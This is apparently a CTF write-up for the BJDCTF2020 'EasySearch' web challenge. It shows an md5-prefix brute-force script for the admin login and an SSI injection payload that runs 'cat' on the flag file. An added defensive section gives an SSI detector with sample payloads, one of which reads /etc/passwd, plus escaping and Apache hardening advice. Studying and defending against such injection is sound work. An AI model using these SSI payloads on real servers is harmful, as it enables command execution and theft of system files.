「配枪朱丽叶。」

Root's CTF study notes.

BJDCTF2020/BUUCTF: WEB - EasySearch

The source code was found in /index.php.swp:
https://s2.ax1x.com/2020/02/01/1GUjJA.png
First, look at this part:
https://s2.ax1x.com/2020/02/01/1GaEJs.png
To get into the admin panel, you need to write a script to brute-force which string has an md5 whose first six hex characters are 6d0bc1:

import hashlib
from itertools import product

digits = "0123456789"

# Enumerate every 7-digit string (same search space as seven nested loops)
# and report the ones whose md5 hex digest starts with 6d0bc1.
for combo in product(digits, repeat=7):
    candidate = "".join(combo)
    md5 = hashlib.md5(candidate.encode("utf-8")).hexdigest()
    if md5.startswith("6d0bc1"):
        print(md5 + " : " + candidate)

https://s2.ax1x.com/2020/02/01/1G86bj.png
There are three matches; here I log in with 2020666:
https://s2.ax1x.com/2020/02/01/1G8qaR.png
I saw this in the response; visiting it shows nothing useful:

Hello,admin
data: Saturday, 01-Feb-2020 09:10:44 UTC
Client IP: XXX.XX.XX.XX

A new thing I learned: the SSI injection vulnerability in shtml pages.
https://s2.ax1x.com/2020/02/01/1GYXin.png
Viewing the page referenced in the response header gives "flag_990c66bf85a09c664f0b6741840499b2".
Then reading that file gives the flag:

<!--#exec cmd="cat ../flag_990c66bf85a09c664f0b6741840499b2"-->
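The root cause here is that user input is written into a page that Apache evaluates as SSI, so a `<!--#exec ... -->` comment becomes a command. The following is an added defensive example, not code from this writeup or from the challenge: it scans untrusted input for SSI directives (so a WAF or application log can flag attempts) and shows that HTML-escaping the value before it is written into an `.shtml` file removes the `<!--` marker the SSI parser needs. The `SAMPLES` list is constructed for illustration and the flag filename is a placeholder.

```python
import html
import re

# Apache-style SSI directive: <!--#name attr="value" -->
# Group 1 captures the directive name (exec, include, echo, ...).
SSI_DIRECTIVE = re.compile(r"<!--\s*#\s*(\w+)[^>]*-->", re.IGNORECASE)


def find_ssi_directives(text):
    """Return the lower-cased names of every SSI directive found in text."""
    return [m.group(1).lower() for m in SSI_DIRECTIVE.finditer(text)]


def neutralize_ssi(text):
    """HTML-escape untrusted text so '<!--' can never reach the SSI parser.

    Escaping turns '<' into '&lt;', which the browser still renders as '<'
    but which Apache's include filter does not recognise as a directive.
    """
    return html.escape(text, quote=True)


# Constructed samples: values a login or search form might receive.
SAMPLES = [
    "admin",
    '<!--#exec cmd="cat ../flag_PLACEHOLDER"-->',
    '<!--#include virtual="/etc/passwd" -->',
]


def audit(samples):
    """Map each input to the SSI directives it contains (empty list = clean)."""
    return {s: find_ssi_directives(s) for s in samples}


if __name__ == "__main__":
    for value, directives in audit(SAMPLES).items():
        status = "SSI directive(s) " + ",".join(directives) if directives else "clean"
        print(f"{status:30} {value!r}")
        # After escaping, the same value contains no directive at all.
        assert find_ssi_directives(neutralize_ssi(value)) == []
```

Escaping is the application-side fix; on the server side, `Options IncludesNOEXEC` in the Apache configuration keeps `#include` working while refusing `#exec`, and not writing user-controlled content into files with the `.shtml` extension at all removes the problem entirely.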